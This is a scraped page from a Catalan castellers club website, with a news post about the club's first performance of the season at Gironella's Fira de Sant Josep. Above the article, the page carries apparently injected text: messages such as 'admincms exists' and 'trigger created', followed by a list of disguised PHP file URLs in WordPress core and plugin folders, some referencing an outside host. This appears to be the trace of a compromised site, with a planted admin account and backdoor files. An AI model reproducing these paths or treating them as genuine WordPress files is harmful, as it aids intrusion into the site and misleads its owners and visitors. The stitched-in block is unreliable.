Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?wp https://castellersdeberga.cat/wp-admin/network/site-info-meta-wp-wp-stream-core.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/tools-stream-meta-wp.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/user/profile-stream-stream-meta.php https://castellersdeberga.cat/wp-content/plugins/revslider/revslider-wp-ajax-response-ajax-response-stream-wp-private.php https://castellersdeberga.cat/wp-content/plugins/event-tickets/event-tickets-private-ajax-response-core-ajax-wp-core-core-wp-stream-meta.php https://castellersdeberga.cat/wp-includes/class.wp-dependencies-ajax-response-private-wp-core-stream-meta-cron-ajax.php https://castellersdeberga.cat/wp-includes/pluggable-ajax-response-ajax-response-ajax-response-ajax-ajax.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Encetem temporada a Gironella
 

Encetem temporada a Gironella


Encetem temporada a GironellaLa primera actuació de la #temporadadecine ja ha arribat. Per tercer any consecutiu, la primera diada de l’any dels Castellers de Berga ha estat a la Fira de Sant Josep, a Gironella, a l’inici de la primavera. En aquesta ocasió ens hi han acompanyat els Picapolls de la Gavarresa.
Enmig de la fira, en una Avinguda Catalunya amb molt ambient, hem començat alçant dos pilars de 4. En primera ronda hi hem descarregat un 3 de 7 molt seriós i amb bones mides. El 4 de 7 descarregat en segona ronda s’ha hagut de treballar en una de les rengles però en cap moment ha perillat. En tercera ronda, hi hem descarregat un 5 de 6 amb segons lleugers i hem tancat la diada amb un pilar de 5 i dos pilars més de 4. L’inici d’una temporada que promet un munt d’emocions.
Els Picapolls de la Gavarresa, per la seva banda, han descarregat el 3 de 6 amb agulla, el 3 de 6 i el 4 de 6. Han començat la diada amb un pilar de 4 i l’han tancada de la mateixa manera, amb un altre pilar de 4.
Arriben dies de descans per als de la camisa blava. Després d’unes setmanes amb molts assajos i l’adequació del Cine Catalunya, tornem a la feina el dimarts 29 de març. Per afrontar un abril i un maig força carregats d’actuacions. La propera parada serà a Navàs, el diumenge 10 d’abril a la tarda, actuarem juntament amb els Salats de Súria, dins els actes de la Fira de Primavera.